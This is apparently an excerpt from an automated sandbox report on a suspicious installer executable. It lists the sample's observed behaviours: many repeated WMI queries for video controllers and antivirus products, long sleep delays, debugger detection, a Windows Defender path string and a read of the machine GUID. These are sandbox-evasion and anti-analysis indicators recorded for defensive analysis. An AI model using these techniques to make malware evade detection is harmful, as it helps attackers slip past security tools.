          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeMemory allocated: 3B60000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeMemory allocated: 3D50000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeMemory allocated: 5D50000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWindow / User API: threadDelayed 3552Jump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWindow / User API: threadDelayed 6245Jump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-19805
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exe TID: 2216Thread sleep count: 40 > 30Jump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exe TID: 2216Thread sleep time: -36893488147419080s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exe TID: 964Thread sleep count: 3552 > 30Jump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exe TID: 964Thread sleep count: 6245 > 30Jump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: 998_popxinv_Installer.exe, 00000000.00000002.3869480227.00000000013C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
          Source: 998_popxinv_Installer.exe, 00000000.00000002.3869480227.0000000001407000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeAPI call chain: ExitProcess graph end nodegraph_0-19807
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A165D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00A165D1
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A240E4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00A240E4
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_03AE1628 mov eax, dword ptr fs:[00000030h]0_2_03AE1628
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A27CB1 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00A27CB1
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A165D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00A165D1
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A1C78D SetUnhandledExceptionFilter,0_2_00A1C78D
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A1A792 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A1A792
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A11671 cpuid 0_2_00A11671
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_00A1F895
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00A1E04E
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: GetLocaleInfoA,0_2_00A24859
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00A1F9BC
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,0_2_00A1F9F8
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00A1F955
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_00A1ECAA
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,0_2_00A244BA
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00A1F4CD
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,0_2_00A1DC2B
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_00A24594
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_00A1F5C2
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_00A1F6C4
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,0_2_00A1F669
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_00A1EF98
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,0_2_00A15FC5
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeCode function: 0_2_00A141BA GetSystemTimeAsFileTime,__aulldiv,0_2_00A141BA
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: 998_popxinv_Installer.exe, 00000000.00000002.3869480227.00000000013DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s Defender\MsMpeng.exe
          Source: 998_popxinv_Installer.exe, 00000000.00000002.3869480227.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, 998_popxinv_Installer.exe, 00000000.00000002.3869480227.00000000013F9000.00000004.00000020.00020000.00000000.sdmp, 998_popxinv_Installer.exe, 00000000.00000002.3872830972.00000000063C1000.00000004.00000020.00020000.00000000.sdmp, 998_popxinv_Installer.exe, 00000000.00000002.3872830972.0000000006390000.00000004.00000020.00020000.00000000.sdmp, 998_popxinv_Installer.exe, 00000000.00000002.3869480227.0000000001468000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: C:\Users\user\Desktop\998_popxinv_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
